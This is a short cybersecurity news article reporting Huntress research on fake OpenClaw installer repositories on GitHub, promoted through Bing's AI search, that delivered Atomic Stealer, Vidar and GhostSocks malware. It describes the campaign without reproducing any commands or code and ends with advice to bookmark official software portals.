Ethical Hacking News
A recent cybersecurity alert warns users of a new threat that exploits Microsoft's AI-powered search feature, Bing, to promote fake GitHub repositories hosting information-stealing malware. The malicious campaign is linked to the popular open-source AI agent, OpenClaw. Users are advised to exercise caution and verify software sources to avoid falling prey to this threat.
The latest cybersecurity alert issued by Huntress highlights a significant threat to users seeking the popular open-source AI agent, OpenClaw.The malicious campaign exploits Microsoft's AI-enhanced search feature, Bing, to promote fake GitHub repositories that host information-stealing malware.Threat actors set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool.The fake repositories contained malware designed to steal information and convert users' machines into proxy nodes.Users are advised to bookmark official portals instead of searching online each time to mitigate the risk of encountering fake repositories or malicious installers.
The latest cybersecurity alert issued by researchers at Huntress highlights a significant threat to users seeking the popular open-source AI agent, OpenClaw. The malicious campaign exploits Microsoft's AI-enhanced search feature, Bing, to promote fake GitHub repositories that host information-stealing malware.
According to the report, the threat actor set up malicious GitHub repositories posing as OpenClaw installers, which were recommended by Bing in its AI-powered search results for the Windows version of the tool. The repositories were designed to look legitimate, with the threat actor tying them to a real GitHub organization named openclaw-installer and copying code from the Cloudflare moltworker project.
The fake OpenClaw repository contained an installation guide for macOS users that instructed them to paste a bash command in Terminal, which would reach a separate GitHub organization called puppeteerrr and a repository named dmg. This repository contained a shell script paired with a Mach-O executable, identified as the Atomic Stealer malware by Huntress.
For Windows users, the threat actor used the fake repositories to deliver OpenClaw_x64.exe, which deployed multiple malicious executables. Most of these executables were Rust-based malware loaders that executed information stealers in memory, including Vidar stealer and GhostSocks backconnect proxy malware. The latter was designed to convert users' machines into a proxy node, allowing attackers to access accounts with stolen credentials.
The malicious campaign has been identified by Huntress as part of a larger threat actor operation that spread multiple executables for malware loaders and infostealers. The researchers have reported the malicious repositories to GitHub, although it is unclear if they have been removed by now.
This incident highlights the risks associated with relying on AI-powered search features like Bing to find software or tools online. As Huntress noted, simply hosting malware on GitHub was enough to poison Bing's AI search results. This underscores the importance of verifying software sources and being cautious when using AI-driven search recommendations.
The OpenClaw project itself is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. Its widespread local access has made it vulnerable to exploitation, with threat actors seeking to collect sensitive information by publishing malicious skills on its official registry and GitHub.
In light of this incident, users are advised to bookmark the official portals of software they use instead of searching online each time. This can help mitigate the risk of encountering fake repositories or malicious installers.
The case also serves as a reminder of the importance of staying informed about emerging cybersecurity threats and staying vigilant when interacting with software online.
Related Information:
https://www.ethicalhackingnews.com/articles/Fake-OpenClaw-GitHub-Repo-Malware-Alert-Bing-AI-Powered-Search-Promotes-Info-Stealing-Malicious-Software-ehn.shtml
Published: Thu Mar 5 17:50:07 2026 by llama3.2 3B Q4_K_M
